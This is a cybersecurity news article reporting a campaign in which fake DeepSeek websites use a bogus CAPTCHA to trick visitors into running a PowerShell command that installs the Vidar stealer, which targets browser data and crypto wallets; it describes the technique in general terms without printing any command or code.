DeepSeek fame hijacked to empty wallets

Last updated: 26 February 2025
DeepSeek captcha ransomware
Image by Cybernews

Crafty scammers are setting up Captchas on Deepseek look-alike sites to steal access to digital wallets.

Amid the DeepSeek hype, cybercriminals are seizing the opportunity to drain digital wallets. Numerous domains imitating the highly popular Chinese AI chatbot have been identified, posing a huge threat to unsuspecting users.

Fake websites that seem to be affiliated with DeepSeek are being utilized to steal credentials, seize browser cookies and autofill data, exfiltrate personal files, and access cryptocurrency wallets.

ADVERTISEMENT

The cybersecurity firm Zscaler's security team has identified nearly 40 malicious domains that help spread Vidar information stealers.

The malware targets 80 cryptocurrency-related extensions, including widely used services such as MetaMask, Coinbase, Binance, and Trust Wallet. It also actively exploits popular browser data.

Fake DeepSeek website
The DeepSeek-themed webpage prompting users to complete a fake partner registration. Source: Zscaler

Browsers that Vidar info stealer targets include:

  • Chrome
  • Microsoft Edge
  • Mozilla Firefox
  • Chromium
  • Opera
  • Opera Crypto
  • Opera GX
  • 360Browser
  • Tencent
  • Vivaldi
  • CryptoTab Browse
  • Epic Privacy Browser
  • CocCoc
  • CentBrowser
  • BraveSoftware

Apart from spreading dangerous malware, fake sites have also been used for a handful of malicious activities, including cryptocurrency pump-and-dump schemes, fake gift card scams, and counterfeit gambling service promotion.

Ernestas Naprys vilius Gintaras Radauskas Paulina Okunyte
Don’t miss our latest stories on Google News
Google News Follow us

How do attackers steal your credentials?

ADVERTISEMENT

The malware campaign begins with users being tricked into believing that a fake website is affiliated with DeepSeek. Upon registration, users are redirected to a fake CAPTCHA page for verification.

CAPTCHA is a widely used security practice that determines whether a user is a human or a bot. However, the attackers exploit it to deliver malware into the user’s device.

Fake DeepSeek captcha
Fake CAPTCHA. Source: Zscaler

Once the user clicks the "I’m not a robot" box, JavaScript on the page automatically copies a malicious PowerShell command to the user's clipboard. The verification guidelines prompt users to execute the command in the Windows Run window.

A packed Vidar malware file will be downloaded and executed if a user runs the PowerShell command. From there, Vidar malware springs into action, locating sensitive files and harvesting data.

The malware conceals its command-and-control (C2) communication using legitimate platforms like Telegram and Steam.

malware injection
Fake CAPTCHA instructions that will execute malicious code. Source: Zscaler
Share
Post
Share
Share
Share
More from Cybernews
“They’re still sulking about the EU switching to USB C:” users react to Apple’s next iPhone plans
Rooting Android invites hackers: up to 3,000 times more vulnerable
Phishing campaign shifts focus to Macs after browsers enhance security on Windows
Links to the “free” TradingView version hide crypto-stealing malware on Reddit
Jensen Huang’s quantum pivot: when tech leaders admit they’re wrong
Meta AI rolling out in Europe in the coming weeks
ADVERTISEMENT
Leave a Reply

Your email address will not be published. Required fields are markedmarked